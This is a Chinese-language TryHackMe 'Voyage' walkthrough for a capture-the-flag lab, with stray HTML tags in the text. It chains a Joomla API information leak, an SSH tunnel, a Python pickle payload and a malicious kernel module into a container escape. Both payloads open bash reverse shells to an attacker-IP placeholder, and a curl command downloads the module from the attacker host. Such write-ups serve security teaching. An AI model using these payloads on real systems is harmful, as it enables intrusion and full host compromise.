Voyage TryHackMe 渗透测试教学文档<\/h1>

1. 目标侦察与信息收集<\/h2>

1.1 端口扫描结果分析<\/h3>

22\/tcp<\/strong>：OpenSSH 9.6p1 Ubuntu 3ubuntu13.11<\/li>
80\/tcp<\/strong>：Apache httpd 2.4.58 (Ubuntu)<\/li>
2222\/tcp<\/strong>：OpenSSH 8.2p1 Ubuntu 4ubuntu0.13<\/li>

发现Joomla!内容管理系统<\/li> <\/ul>
1.2 Web应用识别<\/h3>

访问路径：http:\/\/目标IP\/administrator\/manifests\/files\/joomla.xml<\/code><\/li>
确认Joomla版本：4.2.7<\/strong><\/li> <\/ul> 2. 漏洞利用阶段<\/h2> 2.1 CVE-2023-23752漏洞利用<\/h3> 漏洞描述<\/strong>：Joomla未授权访问API配置信息<\/li> 利用路径<\/strong>：\/api\/index.php\/v1\/config\/application?public=true<\/code><\/li> 获取信息<\/strong>：数据库用户名和密码<\/li> <\/ul> 2.2 初始访问<\/h3> 使用获取的凭据通过SSH连接2222端口<\/li> 命令：ssh -p 2222 root@目标IP<\/code><\/li> 成功获得容器内root权限<\/li> <\/ul> 3. 内网横向移动<\/h2> 3.1 网络探测<\/h3> 容器内发现安装nmap工具<\/li> 扫描内网网段发现另一容器IP：192.168.100.12<\/li> 发现开放端口：5000<\/li> <\/ul> 3.2 端口转发设置<\/h3> 建立SSH隧道进行内网访问：<\/li> <\/ul> ssh root@目标IP -p 2222<\/span> -L 5000:192.168.100.12:5000 <\/span><\/span><\/code><\/pre>3.3 Python反序列化漏洞利用<\/h3> 目标服务使用pickle反序列化Cookie数据<\/li> 构造恶意序列化payload：<\/li> <\/ul> import<\/span> pickle <\/span><\/span>import<\/span> os <\/span><\/span> <\/span><\/span>class<\/span> Malicious<\/span>: <\/span><\/span> def<\/span> __reduce__<\/span>(self): <\/span><\/span> return<\/span> (os.<\/span>system, ("\/bin\/bash -c 'bash -i >& \/dev\/tcp\/攻击者IP\/4444 0>&1'"<\/span>,)) <\/span><\/span> <\/span><\/span>malicious_pickle =<\/span> pickle.<\/span>dumps(Malicious()) <\/span><\/span>print("Malicious pickle in hex:"<\/span>, malicious_pickle.<\/span>hex()) <\/span><\/span><\/code><\/pre> 利用curl发送恶意Cookie：<\/li> <\/ul> curl http:\/\/127.0.0.1:5000\/ -H "Cookie: session_data=生成的hex值"<\/span> <\/span><\/span><\/code><\/pre>4. 权限提升与容器逃逸<\/h2> 4.1 能力检测<\/h3> 检查当前用户权限：capsh --print<\/code><\/li> 发现具备cap_sys_module<\/strong>能力<\/li> <\/ul> 4.2 内核模块攻击<\/h3> 利用cap_sys_module能力加载恶意内核模块<\/li> 创建恶意内核模块代码：<\/li> <\/ul> #include<\/span> <linux\/init.h><\/span> <\/span><\/span><\/span>#include<\/span> <linux\/module.h><\/span> <\/span><\/span><\/span>#include<\/span> <linux\/kmod.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>MODULE_LICENSE("GPL"<\/span>); <\/span><\/span> <\/span><\/span>static<\/span> int<\/span> shell<\/span>(void<\/span>) <\/span><\/span>{ <\/span><\/span> char<\/span> *<\/span>argv[] =<\/span> { <\/span><\/span> "\/bin\/bash"<\/span>, "-c"<\/span>, "bash -i >& \/dev\/tcp\/攻击者IP\/4445 0>&1"<\/span>, NULL <\/span><\/span> }; <\/span><\/span> static<\/span> char<\/span> *<\/span>env[] =<\/span> { <\/span><\/span> "HOME=\/"<\/span>, <\/span><\/span> "TERM=linux"<\/span>, <\/span><\/span> "PATH=\/sbin:\/bin:\/usr\/sbin:\/usr\/bin"<\/span>, NULL <\/span><\/span> }; <\/span><\/span> return<\/span> call_usermodehelper(argv[0<\/span>], argv, env, UMH_WAIT_PROC); <\/span><\/span>} <\/span><\/span> <\/span><\/span>static<\/span> int<\/span> init_mod<\/span>(void<\/span>) <\/span><\/span>{ <\/span><\/span> return<\/span> shell(); <\/span><\/span>} <\/span><\/span> <\/span><\/span>static<\/span> void<\/span> exit_mod<\/span>(void<\/span>) <\/span><\/span>{ <\/span><\/span> return<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>module_init(init_mod); <\/span><\/span>module_exit(exit_mod); <\/span><\/span><\/code><\/pre>4.3 编译和加载模块<\/h3> 创建Makefile：<\/li> <\/ul> obj-m +=<\/span> shell.o <\/span><\/span>all<\/span>:<\/span> <\/span><\/span> make -C \/lib\/modules\/$(<\/span>shell uname -r)<\/span>\/build M=<\/span>$(<\/span>PWD)<\/span> modules <\/span><\/span>clean<\/span>:<\/span> <\/span><\/span> make -C \/lib\/modules\/$(<\/span>shell uname -r)<\/span>\/build M=<\/span>$(<\/span>PWD)<\/span> clean <\/span><\/span><\/code><\/pre> 下载并加载模块：<\/li> <\/ul> # 从攻击机下载编译好的模块<\/span> <\/span><\/span>curl http:\/\/攻击者IP:8080\/shell.ko -o shell.ko <\/span><\/span> <\/span><\/span># 加载恶意模块<\/span> <\/span><\/span>insmod shell.ko <\/span><\/span><\/code><\/pre>5. 关键技术与知识点<\/h2> 5.1 漏洞利用链<\/h3> 信息泄露漏洞<\/strong>（CVE-2023-23752）→ 获取数据库凭据<\/li> 弱口令\/默认凭据<\/strong>→ SSH初始访问<\/li> 内网服务漏洞<\/strong>→ Python反序列化<\/li> Linux能力滥用<\/strong>→ 容器逃逸<\/li> <\/ol> 5.2 技术要点<\/h3> Joomla版本识别<\/strong>：通过manifest文件获取精确版本信息<\/li> API未授权访问<\/strong>：REST API配置信息泄露<\/li> SSH隧道技术<\/strong>：内网端口转发和访问<\/li> Pickle反序列化<\/strong>：Python对象序列化漏洞利用<\/li> Linux Capabilities<\/strong>：cap_sys_module特权滥用<\/li> 内核模块攻击<\/strong>：LKM（Loadable Kernel Module）恶意利用<\/li> <\/ul> 5.3 防御建议<\/h3> 及时更新<\/strong>：保持Joomla等CMS系统最新版本<\/li> 访问控制<\/strong>：严格限制API接口访问权限<\/li> 网络隔离<\/strong>：容器网络适当分段和隔离<\/li> 能力限制<\/strong>：容器运行时减少不必要的capabilities<\/li> 输入验证<\/strong>：对反序列化操作进行严格验证<\/li> <\/ol> 6. 攻击流程总结<\/h2> 端口扫描 → Web应用识别 → 漏洞利用 → 初始访问 → 内网探测 → 横向移动 → 权限提升 → 容器逃逸 → 宿主机控制<\/p> 这个渗透测试过程展示了从外部侦察到最终获得宿主机权限的完整攻击链，涉及Web漏洞、内网横向移动和Linux特权提升等多个重要攻击技术。<\/p>